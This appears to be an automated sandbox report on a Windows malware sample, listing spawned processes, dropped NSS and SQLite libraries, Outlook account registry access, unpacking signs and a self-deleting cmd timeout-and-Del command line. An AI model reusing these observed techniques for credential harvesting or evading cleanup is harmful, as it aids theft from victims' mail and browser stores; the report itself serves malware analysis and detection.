Source: 3BD3.exe, 00000004.00000002.1533243719.00000000723F0000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: 3BD3.exe, 00000004.00000002.1533243719.00000000723F0000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 3BD3.exe, 00000004.00000002.1533243719.00000000723F0000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.4.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.4.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.4.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.4.dr	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.4.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 3BD3.exe, 00000004.00000002.1533243719.00000000723F0000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 3BD3.exe, 00000004.00000002.1533243719.00000000723F0000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 3BD3.exe, 00000004.00000002.1533243719.00000000723F0000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 3BD3.exe, 00000004.00000002.1533243719.00000000723F0000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: 3BD3.exe, 00000004.00000002.1533243719.00000000723F0000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 3BD3.exe, 00000004.00000002.1533243719.00000000723F0000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.4.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: unknown	Process created: C:\Users\user\Desktop\y98WYYcJ2U.exe 'C:\Users\user\Desktop\y98WYYcJ2U.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\cwfbibg C:\Users\user\AppData\Roaming\cwfbibg
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\3BD3.exe C:\Users\user\AppData\Local\Temp\3BD3.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\48F3.exe C:\Users\user\AppData\Local\Temp\48F3.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\AppData\Local\Temp\3BD3.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3BD3.exe C:\Users\user\AppData\Local\Temp\3BD3.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\48F3.exe C:\Users\user\AppData\Local\Temp\48F3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\AppData\Local\Temp\3BD3.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.4.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.4.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.4.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: 3BD3.exe, 00000004.00000002.1533243719.00000000723F0000.00000002.00020000.sdmp, nss3.dll.4.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.4.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.4.dr
Source:	Binary string: wntdll.pdb source: y98WYYcJ2U.exe, cwfbibg, 00000003.00000002.1452285967.0000000072621000.00000020.00020000.sdmp, 210A.tmp.0.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.4.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: 3BD3.exe, 00000004.00000002.1533750287.0000000072561000.00000020.00020000.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: 3BD3.exe, 00000004.00000002.1533989604.0000000072599000.00000002.00020000.sdmp, mozglue.dll.4.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.4.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.4.dr
Source:	Binary string: msvcp140.i386.pdb source: 3BD3.exe, 00000004.00000002.1533478775.00000000724F1000.00000020.00020000.sdmp, msvcp140.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.4.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.4.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.4.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.4.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.4.dr
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.1311256573.00000000060E0000.00000002.00000001.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.4.dr
Source:	Binary string: wntdll.pdbUGP source: y98WYYcJ2U.exe, 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, cwfbibg, 00000003.00000002.1452285967.0000000072621000.00000020.00020000.sdmp, 210A.tmp.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.4.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: 3BD3.exe, 00000004.00000002.1533989604.0000000072599000.00000002.00020000.sdmp, mozglue.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.4.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source:	Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.1311256573.00000000060E0000.00000002.00000001.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source:	Binary string: vcruntime140.i386.pdb source: 3BD3.exe, 00000004.00000002.1533750287.0000000072561000.00000020.00020000.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.4.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.4.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: 3BD3.exe, 00000004.00000002.1533478775.00000000724F1000.00000020.00020000.sdmp, msvcp140.dll.4.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.4.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.4.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.4.dr

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Unpacked PE file: 0.2.y98WYYcJ2U.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\cwfbibg	Unpacked PE file: 3.2.cwfbibg.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Unpacked PE file: 4.2.3BD3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Unpacked PE file: 5.2.48F3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Unpacked PE file: 4.2.3BD3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Unpacked PE file: 5.2.48F3.exe.400000.0.unpack

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0x845DE87A [Wed May 16 02:07:54 2040 UTC]

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

Code function: 0_2_001D003C GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAlloc,VirtualProtect,VirtualFree,LoadLibraryA,GetProcAddress,

0_2_001D003C

Source: 210A.tmp.0.dr	Static PE information: section name: RT
Source: 210A.tmp.0.dr	Static PE information: section name: .mrdata
Source: 210A.tmp.0.dr	Static PE information: section name: .00cfg
Source: 210A.tmp.3.dr	Static PE information: section name: RT
Source: 210A.tmp.3.dr	Static PE information: section name: .mrdata
Source: 210A.tmp.3.dr	Static PE information: section name: .00cfg
Source: sqlite3[1].dll.4.dr	Static PE information: section name: /4
Source: sqlite3[1].dll.4.dr	Static PE information: section name: /19
Source: sqlite3[1].dll.4.dr	Static PE information: section name: /31
Source: sqlite3[1].dll.4.dr	Static PE information: section name: /45
Source: sqlite3[1].dll.4.dr	Static PE information: section name: /57
Source: sqlite3[1].dll.4.dr	Static PE information: section name: /70
Source: sqlite3[1].dll.4.dr	Static PE information: section name: /81
Source: sqlite3[1].dll.4.dr	Static PE information: section name: /92
Source: sqlite3.dll.4.dr	Static PE information: section name: /4
Source: sqlite3.dll.4.dr	Static PE information: section name: /19
Source: sqlite3.dll.4.dr	Static PE information: section name: /31
Source: sqlite3.dll.4.dr	Static PE information: section name: /45
Source: sqlite3.dll.4.dr	Static PE information: section name: /57
Source: sqlite3.dll.4.dr	Static PE information: section name: /70
Source: sqlite3.dll.4.dr	Static PE information: section name: /81
Source: sqlite3.dll.4.dr	Static PE information: section name: /92

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_00404440 push ebx; ret	0_2_0040444F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_00403871 push edx; retf	0_2_0040388D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_00402417 push 00000017h; iretd	0_2_0040243E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_00405C22 pushfd ; ret	0_2_00405C23
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_00404488 push ebx; ret	0_2_0040444F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_00403890 push edx; retf	0_2_0040388D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_00402DE1 push eax; ret	0_2_00402E8C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_004059BB push ebp; iretd	0_2_004059D5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_00404E4A push D87185A9h; ret	0_2_00404E67
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_00404E8F push D87185A9h; ret	0_2_00404E67
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_004037C4 push ss; ret	0_2_004037C5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_004023E8 push 00000017h; iretd	0_2_0040243E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_004023AE push 00000017h; iretd	0_2_0040243E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7269DE2D push ecx; ret	0_2_7269DE40
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_001D3814 push ss; ret	0_2_001D3815
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_001D38C1 push edx; retf	0_2_001D38DD
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_001D38E0 push edx; retf	0_2_001D38DD
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_001D5A0B push ebp; iretd	0_2_001D5A25
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_001D23FE push 00000017h; iretd	0_2_001D248E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_001D5C72 pushfd ; ret	0_2_001D5C73
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_001D2467 push 00000017h; iretd	0_2_001D248E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_001D4490 push ebx; ret	0_2_001D449F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_001D44D8 push ebx; ret	0_2_001D449F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_001D4E9A push D87185A9h; ret	0_2_001D4EB7
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_001D4EDF push D87185A9h; ret	0_2_001D4EB7
Source: C:\Users\user\AppData\Roaming\cwfbibg	Code function: 3_2_001D3814 push ss; ret	3_2_001D3815
Source: C:\Users\user\AppData\Roaming\cwfbibg	Code function: 3_2_001D5A0B push ebp; iretd	3_2_001D5A25
Source: C:\Users\user\AppData\Roaming\cwfbibg	Code function: 3_2_001D5C72 pushfd ; ret	3_2_001D5C73
Source: C:\Users\user\AppData\Roaming\cwfbibg	Code function: 3_2_001D2467 push 00000017h; iretd	3_2_001D248E
Source: C:\Users\user\AppData\Roaming\cwfbibg	Code function: 3_2_001D4E9A push D87185A9h; ret	3_2_001D4EB7
Source: C:\Users\user\AppData\Roaming\cwfbibg	Code function: 3_2_001D4490 push ebx; ret	3_2_001D449F

Source: initial sample	Static PE information: section name: .text entropy: 7.45545945684
Source: initial sample	Static PE information: section name: .text entropy: 6.85194020686
Source: initial sample	Static PE information: section name: .text entropy: 7.45545945684
Source: initial sample	Static PE information: section name: .text entropy: 7.95304658662
Source: initial sample	Static PE information: section name: .text entropy: 6.85194020686
Source: initial sample	Static PE information: section name: .text entropy: 7.82383803836

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\cwfbibg	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\ldif60.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Ogeq\tiik.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\qipcap.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3BD3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\cwfbibg	File created: C:\Users\user\AppData\Local\Temp\210A.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File created: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll	Jump to dropped file
